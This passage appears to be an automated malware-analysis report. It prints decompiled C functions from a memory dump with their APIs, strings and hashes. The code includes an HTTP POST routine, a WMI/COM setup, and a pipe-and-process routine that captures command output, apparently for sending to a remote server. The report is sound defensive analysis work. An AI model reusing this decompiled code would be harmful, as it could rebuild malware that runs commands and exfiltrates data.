Instruction Fuzzy Hash: AD31A771900544ABEB64BF30DC49EAF37B8FB81720F10852AF495C6292DF389A49DF21

Uniqueness

Uniqueness Score: -1.00%

Function 0008E668, Relevance: 15.3, APIs: 9, Strings: 1, Instructions: 305
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E0008E668(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12, intOrPtr* _a16, intOrPtr* _a20, intOrPtr _a24) {
				char _v8;
				char _v12;
				signed int _v16;
				signed int _v20;
				char _v24;
				intOrPtr _v28;
				char _v32;
				intOrPtr _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				char _v64;
				int _v76;
				void* _v80;
				intOrPtr _v100;
				int _v104;
				void* _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				char* _v120;
				void _v124;
				char _v140;
				void _v396;
				void _v652;
				intOrPtr _t105;
				intOrPtr _t113;
				intOrPtr* _t115;
				intOrPtr _t118;
				intOrPtr _t121;
				intOrPtr _t124;
				intOrPtr _t127;
				intOrPtr _t131;
				char _t133;
				intOrPtr _t136;
				char _t138;
				char _t139;
				intOrPtr _t141;
				intOrPtr _t147;
				intOrPtr _t154;
				intOrPtr _t158;
				intOrPtr _t162;
				intOrPtr _t164;
				intOrPtr _t166;
				intOrPtr _t172;
				intOrPtr _t176;
				void* _t183;
				void* _t185;
				intOrPtr _t186;
				char _t195;
				intOrPtr _t203;
				intOrPtr _t204;
				signed int _t209;
				void _t212;
				intOrPtr _t213;
				void* _t214;
				intOrPtr _t216;
				char _t217;
				intOrPtr _t218;
				signed int _t219;
				signed int _t220;
				void* _t221;

				_v40 = _v40 & 0x00000000;
				_v24 = 4;
				_v36 = 1;
				_t214 = __edx;
				memset( &_v396, 0, 0x100);
				memset( &_v652, 0, 0x100);
				_v64 = E000895C7(0x85b);
				_v60 = E000895C7(0xdc9);
				_v56 = E000895C7(0x65d);
				_v52 = E000895C7(0xdd3);
				_t105 = E000895C7(0xb74);
				_v44 = _v44 & 0;
				_t212 = 0x3c;
				_v48 = _t105;
				memset( &_v124, 0, 0x100);
				_v116 = 0x10;
				_v120 =  &_v140;
				_v124 = _t212;
				_v108 =  &_v396;
				_v104 = 0x100;
				_v80 =  &_v652;
				_push( &_v124);
				_push(0);
				_v76 = 0x100;
				_push(E0008C379(_t214));
				_t113 =  *0x9e6a4; // 0x1400810
				_push(_t214);
				if( *((intOrPtr*)(_t113 + 0x28))() != 0) {
					_t209 = 0;
					_v20 = 0;
					do {
						_t115 =  *0x9e6a4; // 0x1400810
						_v12 = 0x8404f700;
						_t213 =  *_t115( *0x9e788,  *((intOrPtr*)(_t221 + _t209 * 4 - 0x24)), 0, 0, 0);
						if(_t213 != 0) {
							_t195 = 3;
							_t185 = 4;
							_v8 = _t195;
							_t118 =  *0x9e6a4; // 0x1400810
							 *((intOrPtr*)(_t118 + 0x14))(_t213, _t195,  &_v8, _t185);
							_v8 = 0x3a98;
							_t121 =  *0x9e6a4; // 0x1400810
							 *((intOrPtr*)(_t121 + 0x14))(_t213, 2,  &_v8, _t185);
							_v8 = 0x493e0;
							_t124 =  *0x9e6a4; // 0x1400810
							 *((intOrPtr*)(_t124 + 0x14))(_t213, 6,  &_v8, _t185);
							_v8 = 0x493e0;
							_t127 =  *0x9e6a4; // 0x1400810
							 *((intOrPtr*)(_t127 + 0x14))(_t213, 5,  &_v8, _t185);
							_t131 =  *0x9e6a4; // 0x1400810
							_t186 =  *((intOrPtr*)(_t131 + 0x1c))(_t213,  &_v396, _v100, 0, 0, 3, 0, 0);
							if(_a24 != 0) {
								E0008980C(_a24);
							}
							if(_t186 != 0) {
								_t133 = 0x8484f700;
								if(_v112 != 4) {
									_t133 = _v12;
								}
								_t136 =  *0x9e6a4; // 0x1400810
								_t216 =  *((intOrPtr*)(_t136 + 0x20))(_t186, "POST",  &_v652, 0, 0,  &_v64, _t133, 0);
								_v8 = _t216;
								if(_a24 != 0) {
									E0008980C(_a24);
								}
								if(_t216 != 0) {
									_t138 = 4;
									if(_v112 != _t138) {
										L19:
										_t139 = E000895C7(0x777);
										_t217 = _t139;
										_v12 = _t217;
										_t141 =  *0x9e6a4; // 0x1400810
										_t218 = _v8;
										_v28 =  *((intOrPtr*)(_t141 + 0x24))(_t218, _t217, E0008C379(_t217), _a4, _a8);
										E000885C2( &_v12);
										if(_a24 != 0) {
											E0008980C(_a24);
										}
										if(_v28 != 0) {
											L28:
											_v24 = 8;
											_push(0);
											_v32 = 0;
											_v28 = 0;
											_push( &_v24);
											_push( &_v32);
											_t147 =  *0x9e6a4; // 0x1400810
											_push(0x13);
											_push(_t218);
											if( *((intOrPtr*)(_t147 + 0xc))() != 0) {
												_t219 = E00089749( &_v32);
												if(_t219 == 0xc8) {
													 *_a20 = _v8;
													 *_a12 = _t213;
													 *_a16 = _t186;
													return 0;
												}
												_t220 =  ~_t219;
												L32:
												_t154 =  *0x9e6a4; // 0x1400810
												 *((intOrPtr*)(_t154 + 8))(_v8);
												L33:
												if(_t186 != 0) {
													_t158 =  *0x9e6a4; // 0x1400810
													 *((intOrPtr*)(_t158 + 8))(_t186);
												}
												if(_t213 != 0) {
													_t203 =  *0x9e6a4; // 0x1400810
													 *((intOrPtr*)(_t203 + 8))(_t213);
												}
												return _t220;
											}
											GetLastError();
											_t220 = 0xfffffff8;
											goto L32;
										} else {
											GetLastError();
											_t162 =  *0x9e6a4; // 0x1400810
											 *((intOrPtr*)(_t162 + 8))(_t218);
											_t218 = 0;
											goto L23;
										}
									}
									_v12 = _t138;
									_push( &_v12);
									_push( &_v16);
									_t172 =  *0x9e6a4; // 0x1400810
									_push(0x1f);
									_push(_t216);
									if( *((intOrPtr*)(_t172 + 0x18))() == 0) {
										L18:
										GetLastError();
										goto L19;
									}
									_v16 = _v16 | 0x00003380;
									_push(4);
									_push( &_v16);
									_t176 =  *0x9e6a4; // 0x1400810
									_push(0x1f);
									_push(_t216);
									if( *((intOrPtr*)(_t176 + 0x14))() != 0) {
										goto L19;
									}
									goto L18;
								} else {
									GetLastError();
									L23:
									_t164 =  *0x9e6a4; // 0x1400810
									 *((intOrPtr*)(_t164 + 8))(_t186);
									_t186 = 0;
									goto L24;
								}
							} else {
								GetLastError();
								L24:
								_t166 =  *0x9e6a4; // 0x1400810
								 *((intOrPtr*)(_t166 + 8))(_t213);
								_t213 = 0;
								goto L25;
							}
						}
						GetLastError();
						L25:
						_t204 = _t218;
						_t209 = _v20 + 1;
						_v20 = _t209;
					} while (_t209 < 2);
					_v8 = _t218;
					if(_t204 != 0) {
						goto L28;
					}
					_t220 = 0xfffffffe;
					goto L33;
				}
				_t183 = 0xfffffffc;
				return _t183;
			}

0x0008e671
0x0008e683
0x0008e68c
0x0008e696
0x0008e69a
0x0008e6ab
0x0008e6c2
0x0008e6cf
0x0008e6dc
0x0008e6e9
0x0008e6ec
0x0008e6f1
0x0008e6f6
0x0008e6f8
0x0008e700
0x0008e70b
0x0008e712
0x0008e71e
0x0008e721
0x0008e72f
0x0008e732
0x0008e738
0x0008e739
0x0008e73b
0x0008e744
0x0008e745
0x0008e74a
0x0008e750
0x0008e75a
0x0008e75c
0x0008e761
0x0008e761
0x0008e770
0x0008e77f
0x0008e783
0x0008e792
0x0008e795
0x0008e79a
0x0008e79e
0x0008e7a5
0x0008e7ac
0x0008e7b4
0x0008e7bc
0x0008e7c3
0x0008e7cb
0x0008e7d3
0x0008e7da
0x0008e7e2
0x0008e7ea
0x0008e7ff
0x0008e80c
0x0008e80e
0x0008e813
0x0008e813
0x0008e81a
0x0008e82b
0x0008e830
0x0008e832
0x0008e832
0x0008e846
0x0008e858
0x0008e85a
0x0008e85d
0x0008e862
0x0008e862
0x0008e869
0x0008e878
0x0008e87c
0x0008e8ba
0x0008e8bf
0x0008e8c7
0x0008e8cc
0x0008e8d7
0x0008e8dd
0x0008e8e7
0x0008e8ea
0x0008e8f3
0x0008e8f8
0x0008e8f8
0x0008e901
0x0008e94a
0x0008e94c
0x0008e953
0x0008e954
0x0008e957
0x0008e95d
0x0008e961
0x0008e962
0x0008e967
0x0008e969
0x0008e96f
0x0008e984
0x0008e98c
0x0008e9c1
0x0008e9c6
0x0008e9cb
0x00000000
0x0008e9cd
0x0008e98e
0x0008e990
0x0008e990
0x0008e999
0x0008e99c
0x0008e99e
0x0008e9a0
0x0008e9a6
0x0008e9a6
0x0008e9ab
0x0008e9ad
0x0008e9b4
0x0008e9b4
0x00000000
0x0008e9b7
0x0008e971
0x0008e979
0x00000000
0x0008e903
0x0008e903
0x0008e909
0x0008e90f
0x0008e912
0x00000000
0x0008e912
0x0008e901
0x0008e87e
0x0008e884
0x0008e888
0x0008e889
0x0008e88e
0x0008e890
0x0008e896
0x0008e8b4
0x0008e8b4
0x00000000
0x0008e8b4
0x0008e898
0x0008e8a2
0x0008e8a4
0x0008e8a5
0x0008e8aa
0x0008e8ac
0x0008e8b2
0x00000000
0x00000000
0x00000000
0x0008e86b
0x0008e86b
0x0008e914
0x0008e914
0x0008e91a
0x0008e91d
0x00000000
0x0008e91d
0x0008e81c
0x0008e81c
0x0008e91f
0x0008e91f
0x0008e925
0x0008e928
0x00000000
0x0008e928
0x0008e81a
0x0008e785
0x0008e92a
0x0008e92d
0x0008e92f
0x0008e932
0x0008e935
0x0008e93e
0x0008e943
0x00000000
0x00000000
0x0008e947
0x00000000
0x0008e947
0x0008e754
0x00000000

APIs

memset.MSVCRT ref: 0008E69A
memset.MSVCRT ref: 0008E6AB
memset.MSVCRT ref: 0008E700
GetLastError.KERNEL32(?,?,?,?,?,?,00000000,000007D0,00000000), ref: 0008E785

Strings

POST, xrefs: 0008E84B

Memory Dump Source

Source File: 0000000E.00000002.881673087.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Yara matches

Similarity

API ID: memset$ErrorLast
String ID: POST
API String ID: 2570506013-1814004025
Opcode ID: 367a7a72f7db2160077767910a4473ccd00a1e93e961edb2d3cd1ed941d500fc
Instruction ID: ea6434b96816f391ca67125378d8c048189af0a816e14d9e93347baa296bf716
Opcode Fuzzy Hash: 367a7a72f7db2160077767910a4473ccd00a1e93e961edb2d3cd1ed941d500fc
Instruction Fuzzy Hash: 50B13C71900208AFEB55EFA4DC89EAE7BB8FF58310F10406AF545EB291DB749E44CB61

Uniqueness

Uniqueness Score: -1.00%

Function 000916B8, Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 70
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 28%

			E000916B8(signed int* _a4) {
				char _v8;
				_Unknown_base(*)()* _v12;
				_Unknown_base(*)()* _v16;
				char _v20;
				_Unknown_base(*)()* _t16;
				_Unknown_base(*)()* _t17;
				void* _t22;
				intOrPtr* _t28;
				signed int _t29;
				signed int _t30;
				struct HINSTANCE__* _t32;
				void* _t34;

				_t30 = 0;
				_v8 = 0;
				_t32 = GetModuleHandleA("advapi32.dll");
				if(_t32 == 0) {
					L9:
					return 1;
				}
				_t16 = GetProcAddress(_t32, "CryptAcquireContextA");
				_v12 = _t16;
				if(_t16 == 0) {
					goto L9;
				}
				_t17 = GetProcAddress(_t32, "CryptGenRandom");
				_v16 = _t17;
				if(_t17 == 0) {
					goto L9;
				}
				_t28 = GetProcAddress(_t32, "CryptReleaseContext");
				if(_t28 == 0) {
					goto L9;
				}
				_push(0xf0000000);
				_push(1);
				_push(0);
				_push(0);
				_push( &_v8);
				if(_v12() == 0) {
					goto L9;
				}
				_t22 = _v16(_v8, 4,  &_v20);
				 *_t28(_v8, 0);
				if(_t22 == 0) {
					goto L9;
				}
				_t29 = 0;
				do {
					_t30 = _t30 << 0x00000008 |  *(_t34 + _t29 - 0x10) & 0x000000ff;
					_t29 = _t29 + 1;
				} while (_t29 < 4);
				 *_a4 = _t30;
				return 0;
			}

0x000916c1
0x000916c8
0x000916d1
0x000916d5
0x00091750
0x00000000
0x00091752
0x000916e3
0x000916e5
0x000916ea
0x00000000
0x00000000
0x000916f2
0x000916f4
0x000916f9
0x00000000
0x00000000
0x00091703
0x00091707
0x00000000
0x00000000
0x00091709
0x0009170e
0x00091710
0x00091711
0x00091715
0x0009171b
0x00000000
0x00000000
0x00091726
0x0009172f
0x00091733
0x00000000
0x00000000
0x00091735
0x00091737
0x0009173f
0x00091741
0x00091742
0x0009174a
0x00000000

APIs

GetModuleHandleA.KERNEL32(advapi32.dll,00000000,00000000,00000000,0008765A,?,?,00000000,?), ref: 000916CB
GetProcAddress.KERNEL32(00000000,CryptAcquireContextA,?,?,00000000,?), ref: 000916E3
GetProcAddress.KERNEL32(00000000,CryptGenRandom,?,?,00000000,?), ref: 000916F2
GetProcAddress.KERNEL32(00000000,CryptReleaseContext,?,?,00000000,?), ref: 00091701

Strings

CryptAcquireContextA, xrefs: 000916DD
CryptGenRandom, xrefs: 000916EC
advapi32.dll, xrefs: 000916C3
CryptReleaseContext, xrefs: 000916FB

Memory Dump Source

Source File: 0000000E.00000002.881673087.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Yara matches

Similarity

API ID: AddressProc$HandleModule
String ID: CryptAcquireContextA$CryptGenRandom$CryptReleaseContext$advapi32.dll
API String ID: 667068680-129414566
Opcode ID: 27f9b75c89bbff0010089760dc2ea391a5fe869bbdee21b5a79a33e181e9a0cc
Instruction ID: f7ee788a374f61118607f953ef7ffa495e5dc05b0280f9c56cf14542586de261
Opcode Fuzzy Hash: 27f9b75c89bbff0010089760dc2ea391a5fe869bbdee21b5a79a33e181e9a0cc
Instruction Fuzzy Hash: B5117731B046177BDF515BEA8C84EEFBBF9AF46780B044065FA15F6240DA70D901A764

Uniqueness

Uniqueness Score: -1.00%

Function 00092122, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 98
stringCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E00092122(char* _a4, intOrPtr _a8, long long _a12, signed int _a20) {
				signed int _t12;
				signed int _t13;
				int _t15;
				char* _t24;
				char* _t26;
				char* _t28;
				char* _t29;
				signed int _t40;
				char* _t43;
				char* _t45;
				long long* _t47;

				_t12 = _a20;
				if(_t12 == 0) {
					_t12 = 0x11;
				}
				_t26 = _a4;
				_push(_t30);
				 *_t47 = _a12;
				_push(_t12);
				_push("%.*g");
				_push(_a8);
				_push(_t26);
				L00092285();
				_t40 = _t12;
				if(_t40 < 0 || _t40 >= _a8) {
					L19:
					_t13 = _t12 | 0xffffffff;
					goto L20;
				} else {
					L000922CD();
					_t15 =  *((intOrPtr*)( *_t12));
					if(_t15 != 0x2e) {
						_t24 = strchr(_t26, _t15);
						if(_t24 != 0) {
							 *_t24 = 0x2e;
						}
					}
					if(strchr(_t26, 0x2e) != 0 || strchr(_t26, 0x65) != 0) {
						L11:
						_t43 = strchr(_t26, 0x65);
						_t28 = _t43;
						if(_t43 == 0) {
							L18:
							_t13 = _t40;
							L20:
							return _t13;
						}
						_t45 = _t43 + 1;
						_t29 = _t28 + 2;
						if( *_t45 == 0x2d) {
							_t45 = _t29;
						}
						while( *_t29 == 0x30) {
							_t29 = _t29 + 1;
						}
						if(_t29 != _t45) {
							E00088706(_t45, _t29, _t40 - _t29 + _a4);
							_t40 = _t40 + _t45 - _t29;
						}
						goto L18;
					} else {
						_t6 = _t40 + 3; // 0x909b2
						_t12 = _t6;
						if(_t12 >= _a8) {
							goto L19;
						}
						_t26[_t40] = 0x302e;
						( &(_t26[2]))[_t40] = 0;
						_t40 = _t40 + 2;
						goto L11;
					}
				}
			}

0x00092125
0x0009212a
0x0009212e
0x0009212e
0x00092133
0x00092138
0x00092139
0x0009213c
0x0009213d
0x00092142
0x00092145
0x00092146
0x0009214b
0x00092152
0x000921f8
0x000921f8
0x00000000
0x00092161
0x00092161
0x00092168
0x0009216c
0x00092173
0x0009217c
0x0009217e
0x0009217e
0x0009217c
0x0009218d
0x000921b3
0x000921bc
0x000921be
0x000921c4
0x000921f3
0x000921f3
0x000921fb
0x000921fe
0x000921fe
0x000921c6
0x000921c7
0x000921cd
0x000921cf
0x000921cf
0x000921d4
0x000921d3
0x000921d3
0x000921db
0x000921e7
0x000921f1
0x000921f1
0x00000000
0x0009219d
0x0009219d
0x0009219d
0x000921a3
0x00000000
0x00000000
0x000921a5
0x000921ab
0x000921b0
0x00000000
0x000921b0
0x0009218d

APIs

_snprintf.MSVCRT ref: 00092146
localeconv.MSVCRT ref: 00092161
strchr.MSVCRT ref: 00092173
strchr.MSVCRT ref: 00092184
strchr.MSVCRT ref: 00092192
strchr.MSVCRT ref: 000921B7

Strings

%.*g, xrefs: 0009213D

Memory Dump Source

Source File: 0000000E.00000002.881673087.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Yara matches

Similarity

API ID: strchr$_snprintflocaleconv
String ID: %.*g
API String ID: 1910550357-952554281
Opcode ID: ce2afa961fa85e74440034e363737a64cfa4b0764273ec5c58c06da3881b6a43
Instruction ID: 1807b53470dfa9210b137be6f10a1510799a81b613ee7934cd0fe15d2e85ebbb
Opcode Fuzzy Hash: ce2afa961fa85e74440034e363737a64cfa4b0764273ec5c58c06da3881b6a43
Instruction Fuzzy Hash: 8E216A766047427ADF259A28DCC6BEA3BDCDF25330F150155FE509A182EA74EC60B3A0

Uniqueness

Uniqueness Score: -1.00%

Function 000902B2, Relevance: 10.9, APIs: 2, Strings: 4, Instructions: 445COMMON

Download Yara Rule

APIs

_snprintf.MSVCRT ref: 00090332
qsort.MSVCRT ref: 000905B0

Strings

null, xrefs: 000902F7
true, xrefs: 00090309
%I64d, xrefs: 00090324
false, xrefs: 00090315

Memory Dump Source

Source File: 0000000E.00000002.881673087.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Yara matches

Similarity

API ID: _snprintfqsort
String ID: %I64d$false$null$true
API String ID: 756996078-4285102228
Opcode ID: c3656f1e48f6528892983799641ac3336606c700c83bb0b62e38ba968db40f99
Instruction ID: e8f87335b98eb15e4b72e6aadc3c6444a94586e470a32963d335527edd021b66
Opcode Fuzzy Hash: c3656f1e48f6528892983799641ac3336606c700c83bb0b62e38ba968db40f99
Instruction Fuzzy Hash: F1E17DB190020ABFDF119F64CC46EEF3BA9EF55384F108019FE1596152EB31DA61EBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0008D748, Relevance: 9.1, APIs: 6, Instructions: 87memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(00000000), ref: 0008D75C
SysAllocString.OLEAUT32(?), ref: 0008D764
SysAllocString.OLEAUT32(00000000), ref: 0008D778
SysFreeString.OLEAUT32(?), ref: 0008D7F3
SysFreeString.OLEAUT32(?), ref: 0008D7F6
SysFreeString.OLEAUT32(?), ref: 0008D7FB

Memory Dump Source

Source File: 0000000E.00000002.881673087.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Yara matches

Similarity

API ID: String$AllocFree
String ID:
API String ID: 344208780-0
Opcode ID: 0ae35b3864b79a2002ceb2acc07a6214e28e9f75c0e65d5a7fc5e6ecf6b65d72
Instruction ID: a89b29efd16a02d44f6d8e25ac1661f5a2b1d21aaf5940480051179919990030
Opcode Fuzzy Hash: 0ae35b3864b79a2002ceb2acc07a6214e28e9f75c0e65d5a7fc5e6ecf6b65d72
Instruction Fuzzy Hash: 1821F975900218AFDB10EFA5CC88DAFBBBDFF48654B10449AF505E7250DA71AE01CB60

Uniqueness

Uniqueness Score: -1.00%

Function 000907F7, Relevance: 7.7, APIs: 2, Strings: 3, Instructions: 158COMMON

Download Yara Rule

Strings

\u%04X\u%04X, xrefs: 00090950
\u%04X, xrefs: 00090911
@, xrefs: 00090865

Memory Dump Source

Source File: 0000000E.00000002.881673087.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Yara matches

Similarity

API ID:
String ID: @$\u%04X$\u%04X\u%04X
API String ID: 0-2132903582
Opcode ID: ad3677773898463b826370865ef61fb4a1262acb6dcbc071cab37c5794fd638b
Instruction ID: fcde36fe93850f7dd9ad1ae31ae76e92f94782fe824cdb2d7e9ac6baa3171ba9
Opcode Fuzzy Hash: ad3677773898463b826370865ef61fb4a1262acb6dcbc071cab37c5794fd638b
Instruction Fuzzy Hash: C6411931700205EFEF784A9CCD9ABBF2AA8DF45340F244125F986D6396DA61CD91B3D1

Uniqueness

Uniqueness Score: -1.00%

Function 0008D523, Relevance: 7.6, APIs: 5, Instructions: 87
commemoryCOMMON

Download Yara Rule

C-Code - Quality: 30%

			E0008D523(void* __ecx) {
				char _v8;
				void* _v12;
				char* _t15;
				intOrPtr* _t16;
				void* _t21;
				intOrPtr* _t23;
				intOrPtr* _t24;
				intOrPtr* _t25;
				void* _t30;
				void* _t33;

				_v12 = 0;
				_v8 = 0;
				__imp__CoInitializeEx(0, 0, _t30, _t33, __ecx, __ecx);
				__imp__CoInitializeSecurity(0, 0xffffffff, 0, 0, 0, 3, 0, 0, 0);
				_t15 =  &_v12;
				__imp__CoCreateInstance(0x9b848, 0, 1, 0x9b858, _t15);
				if(_t15 < 0) {
					L5:
					_t23 = _v8;
					if(_t23 != 0) {
						 *((intOrPtr*)( *_t23 + 8))(_t23);
					}
					_t24 = _v12;
					if(_t24 != 0) {
						 *((intOrPtr*)( *_t24 + 8))(_t24);
					}
					_t16 = 0;
				} else {
					__imp__#2(__ecx);
					_t25 = _v12;
					_t21 =  *((intOrPtr*)( *_t25 + 0xc))(_t25, _t15, 0, 0, 0, 0, 0, 0,  &_v8);
					if(_t21 < 0) {
						goto L5;
					} else {
						__imp__CoSetProxyBlanket(_v8, 0xa, 0, 0, 3, 3, 0, 0);
						if(_t21 < 0) {
							goto L5;
						} else {
							_t16 = E00088604(8);
							if(_t16 == 0) {
								goto L5;
							} else {
								 *((intOrPtr*)(_t16 + 4)) = _v12;
								 *_t16 = _v8;
							}
						}
					}
				}
				return _t16;
			}

0x0008d530
0x0008d533
0x0008d536
0x0008d547
0x0008d54d
0x0008d55e
0x0008d566
0x0008d5b7
0x0008d5b7
0x0008d5bc
0x0008d5c1
0x0008d5c1
0x0008d5c4
0x0008d5c9
0x0008d5ce
0x0008d5ce
0x0008d5d1
0x0008d568
0x0008d569
0x0008d56f
0x0008d580
0x0008d585
0x00000000
0x0008d587
0x0008d594
0x0008d59c
0x00000000
0x0008d59e
0x0008d5a0
0x0008d5a8
0x00000000
0x0008d5aa
0x0008d5ad
0x0008d5b3
0x0008d5b3
0x0008d5a8
0x0008d59c
0x0008d585
0x0008d5d6

APIs

CoInitializeEx.OLE32(00000000,00000000), ref: 0008D536
CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0008D547
CoCreateInstance.OLE32(0009B848,00000000,00000001,0009B858,?), ref: 0008D55E
SysAllocString.OLEAUT32(00000000), ref: 0008D569
CoSetProxyBlanket.OLE32(00000000,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 0008D594

Part of subcall function 00088604: RtlAllocateHeap.NTDLL(00000008,?,?,00088F84,00000100,?,00085FCB), ref: 00088612

Memory Dump Source

Source File: 0000000E.00000002.881673087.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Yara matches

Similarity

API ID: Initialize$AllocAllocateBlanketCreateHeapInstanceProxySecurityString
String ID:
API String ID: 1610782348-0
Opcode ID: 61e718e46d9626c6fc607ac76e9c554d5449760960f597cd4dce1a0c96a4aa07
Instruction ID: 5ca9e363416111ca0ccf9453dcb24a0453d396344b9ddfdbf921160754929c58
Opcode Fuzzy Hash: 61e718e46d9626c6fc607ac76e9c554d5449760960f597cd4dce1a0c96a4aa07
Instruction Fuzzy Hash: 6F21E970600245BBEB249B66DC4DE6FBFBCFFC6B25F10415EB541A62A0DA709A01CB30

Uniqueness

Uniqueness Score: -1.00%

Function 000921FF, Relevance: 7.6, APIs: 5, Instructions: 52
stringCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E000921FF(char* __eax, char** _a4, long long* _a8) {
				char* _v8;
				long long _v16;
				char* _t9;
				signed char _t11;
				char** _t19;
				char _t22;
				long long _t32;
				long long _t33;

				_t9 = __eax;
				L000922CD();
				_t19 = _a4;
				_t22 =  *__eax;
				if( *_t22 != 0x2e) {
					_t9 = strchr( *_t19, 0x2e);
					if(_t9 != 0) {
						 *_t9 =  *_t22;
					}
				}
				L00092291();
				 *_t9 =  *_t9 & 0x00000000;
				_t11 = strtod( *_t19,  &_v8);
				asm("fst qword [ebp-0xc]");
				_t32 =  *0x98250;
				asm("fucomp st1");
				asm("fnstsw ax");
				if((_t11 & 0x00000044) != 0) {
					L5:
					st0 = _t32;
					L00092291();
					if( *_t11 != 0x22) {
						_t33 = _v16;
						goto L8;
					} else {
						return _t11 | 0xffffffff;
					}
				} else {
					_t33 =  *0x98258;
					asm("fucomp st1");
					asm("fnstsw ax");
					if((_t11 & 0x00000044) != 0) {
						L8:
						 *_a8 = _t33;
						return 0;
					} else {
						goto L5;
					}
				}
			}

0x000921ff
0x00092207
0x0009220c
0x0009220f
0x00092214
0x0009221a
0x00092223
0x00092227
0x00092227
0x00092223
0x00092229
0x0009222e
0x00092237
0x0009223c
0x0009223f
0x00092248
0x0009224a
0x00092251
0x00092262
0x00092262
0x00092264
0x0009226c
0x00092273
0x00000000
0x0009226e
0x00092272
0x00092272
0x00092253
0x00092253
0x00092259
0x0009225b
0x00092260
0x00092276
0x00092279
0x0009227e
0x00000000
0x00000000
0x00000000
0x00092260

APIs

localeconv.MSVCRT ref: 00092207
strchr.MSVCRT ref: 0009221A
_errno.MSVCRT ref: 00092229
strtod.MSVCRT ref: 00092237
_errno.MSVCRT ref: 00092264

Memory Dump Source

Source File: 0000000E.00000002.881673087.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Yara matches

Similarity

API ID: _errno$localeconvstrchrstrtod
String ID:
API String ID: 1035490122-0
Opcode ID: de4c433de47fb25370494944294a547a5aa963e4291e7017832a2afbf295a471
Instruction ID: 9be57ecffa989f7d2828815fae2d17a9d7f4e019258d81125002a8d3572c8328
Opcode Fuzzy Hash: de4c433de47fb25370494944294a547a5aa963e4291e7017832a2afbf295a471
Instruction Fuzzy Hash: 7701F239904205FADF127F24E9057DD7BA8AF4B360F2041D1E9D0A61E2DB759854E7A0

Uniqueness

Uniqueness Score: -1.00%

Function 0008A9B7, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 177
pipeCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E0008A9B7(signed int __ecx) {
				void* _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				signed int _v24;
				char _v28;
				char _v32;
				char _v36;
				struct _SECURITY_ATTRIBUTES _v48;
				intOrPtr _v60;
				char _v64;
				intOrPtr _v76;
				intOrPtr _v80;
				void* _v84;
				short _v92;
				intOrPtr _v96;
				void _v140;
				intOrPtr _t77;
				void* _t79;
				intOrPtr _t85;
				intOrPtr _t87;
				intOrPtr _t89;
				intOrPtr _t92;
				intOrPtr _t98;
				intOrPtr _t100;
				intOrPtr _t102;
				long _t111;
				intOrPtr _t115;
				intOrPtr _t126;
				void* _t127;
				void* _t128;
				void* _t129;
				void* _t130;

				_t111 = 0;
				_v24 = __ecx;
				_v12 = 0;
				_v20 = 0;
				_t127 = 0;
				_v8 = 0;
				_v16 = 0;
				_v48.nLength = 0xc;
				_v48.lpSecurityDescriptor = 0;
				_v48.bInheritHandle = 1;
				_v28 = 0;
				memset( &_v140, 0, 0x44);
				asm("stosd");
				_t130 = _t129 + 0xc;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				if(CreatePipe( &_v12,  &_v20,  &_v48, 0) == 0) {
					L18:
					return 0;
				}
				if(CreatePipe( &_v8,  &_v16,  &_v48, 0) == 0) {
					L13:
					E0008861A( &_v28, 0);
					if(_v20 != 0) {
						_t77 =  *0x9e684; // 0x12af8f0
						 *((intOrPtr*)(_t77 + 0x30))(_v20);
					}
					if(_v8 != 0) {
						_t115 =  *0x9e684; // 0x12af8f0
						 *((intOrPtr*)(_t115 + 0x30))(_v8);
					}
					return _t111;
				}
				_t79 = _v16;
				_v76 = _t79;
				_v80 = _t79;
				_v84 = _v12;
				_v140 = 0x44;
				_v96 = 0x101;
				_v92 = 0;
				_t126 = E00088604(0x1001);
				_v28 = _t126;
				if(_t126 == 0) {
					goto L18;
				}
				_push( &_v64);
				_push( &_v140);
				_t85 =  *0x9e684; // 0x12af8f0
				_push(0);
				_push(0);
				_push(0x8000000);
				_push(1);
				_push(0);
				_push(0);
				_push(_v24);
				_push(0);
				if( *((intOrPtr*)(_t85 + 0x38))() == 0) {
					goto L13;
				}
				_t87 =  *0x9e684; // 0x12af8f0
				 *((intOrPtr*)(_t87 + 0x30))(_v12);
				_t89 =  *0x9e684; // 0x12af8f0
				 *((intOrPtr*)(_t89 + 0x30))(_v16);
				_v24 = _v24 & 0;
				do {
					_t92 =  *0x9e684; // 0x12af8f0
					_v36 =  *((intOrPtr*)(_t92 + 0x88))(_v8, _t126, 0x1000,  &_v24, 0);
					 *((char*)(_v24 + _t126)) = 0;
					if(_t111 == 0) {
						_t127 = E000891A6(_t126, 0);
					} else {
						_push(0);
						_push(_t126);
						_v32 = _t127;
						_t127 = E00089292(_t127);
						E0008861A( &_v32, 0xffffffff);
						_t130 = _t130 + 0x14;
					}
					_t111 = _t127;
					_v32 = _t127;
				} while (_v36 != 0);
				_push( &_v36);
				_push(E0008C379(_t127));
				_t98 =  *0x9e68c; // 0x12afab8
				_push(_t127);
				if( *((intOrPtr*)(_t98 + 0xb8))() != 0) {
					L12:
					_t100 =  *0x9e684; // 0x12af8f0
					 *((intOrPtr*)(_t100 + 0x30))(_v64);
